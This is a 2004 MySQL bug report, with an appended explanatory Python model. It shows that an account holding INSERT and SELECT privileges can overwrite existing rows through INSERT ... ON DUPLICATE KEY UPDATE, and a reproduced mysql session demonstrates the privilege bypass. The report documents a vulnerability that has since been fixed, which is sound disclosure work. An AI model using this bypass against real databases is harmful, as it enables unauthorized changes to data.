Bug #6173 One can circumvent missing UPDATE privileges if he has INSERT + SELECT privs
Submitted: 20 Oct 2004 9:32
Modified: 20 Oct 2004 13:44
Reporter: Dmitry Lenev
Status: Closed
Category: MySQL Server
Severity: S2 (Serious)
Version: 4.1
OS:
Assigned to: Dmitry Lenev

[20 Oct 2004 9:32] Dmitry Lenev
Description:
One can circumvent a missing UPDATE privilege if he has INSERT and SELECT privileges for a table with a primary key.

How to repeat:
mysql> show grants for current_user();
+------------------------------------------------------------+
| Grants for mrbad@localhost                                 |
+------------------------------------------------------------+
| GRANT SELECT, INSERT, CREATE ON *.* TO 'mrbad'@'localhost' |
+------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> create table test_upd (id int primary key, data varchar(255));
Query OK, 0 rows affected (0.01 sec)

mysql> insert into test_upd values (1,'I can''t change it!');
Query OK, 1 row affected (0.02 sec)

mysql> update test_upd set data='I can change it!' where id = 1;
ERROR 1142 (42000): update command denied to user 'mrbad'@'localhost' for
table 'test_upd'
mysql> insert into test_upd values (1,'Some trash') on duplicate key
update data='I can change it!';
Query OK, 2 rows affected (0.00 sec)

mysql> select * from test_upd;
+----+------------------+
| id | data             |
+----+------------------+
|  1 | I can change it! |
+----+------------------+
1 row in set (0.03 sec)

mysql>
[20 Oct 2004 13:44] Dmitry Lenev
Thank you for your bug report. This issue has been committed to our
source repository of that product and will be incorporated into the
next release.

If necessary, you can access the source repository and build the latest
available version, including the bugfix, yourself. More information 
about accessing the source trees is available at
    http://www.mysql.com/doc/en/Installing_source_tree.html

Additional info:

ChangeSet 1.2042.47.1 2004/10/20 16:04:43 dlenev@brandersnatch.localdomain
  Fix for bug #6173 "One can circumvent missing UPDATE privilege if
  he has SELECT and INSERT privileges for table with primary key"
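
A simplified model of the privilege check behind this report, added here as an example; it is not MySQL's code and not part of the original report. It contrasts a check keyed only on the statement's leading verb with one that also counts the UPDATE performed by an ON DUPLICATE KEY UPDATE clause. The function names and the regex-based clause detection are assumptions made for illustration.

```python
import re

# Single-quoted SQL string literal, allowing '' and backslash escapes.
_LITERAL = re.compile(r"'(?:[^'\\]|''|\\.)*'", re.S)
_ODKU = re.compile(r"\bON\s+DUPLICATE\s+KEY\s+UPDATE\b", re.I)


def leading_verb(sql):
    parts = sql.split(None, 1)
    if not parts:
        raise ValueError("empty statement")
    return parts[0].upper()


def required_by_verb(sql):
    """Model of the reported behaviour: only the leading verb is checked."""
    return {leading_verb(sql)}


def required_by_effect(sql):
    """Model of the corrected check: every write the statement can do counts."""
    needed = {leading_verb(sql)}
    # Blank out literals first so the clause is not "found" inside row data.
    body = _LITERAL.sub("''", sql)
    if "INSERT" in needed and _ODKU.search(body):
        needed.add("UPDATE")
    return needed


def is_allowed(grants, sql, requirement):
    """True if the account's grants cover everything the statement requires."""
    return requirement(sql) <= grants


# Grants and statements taken from the report's session.
GRANTS = {"SELECT", "INSERT", "CREATE"}
UPDATE_STMT = "update test_upd set data='I can change it!' where id = 1"
ODKU_STMT = ("insert into test_upd values (1,'Some trash') on duplicate key\n"
             "update data='I can change it!'")
# Constructed edge case: the clause text appears only inside a string value.
LITERAL_STMT = "insert into test_upd values (2,'on duplicate key update x=1')"

if __name__ == "__main__":
    for stmt in (UPDATE_STMT, ODKU_STMT, LITERAL_STMT):
        print(is_allowed(GRANTS, stmt, required_by_verb),
              is_allowed(GRANTS, stmt, required_by_effect),
              stmt.split("\n")[0])
```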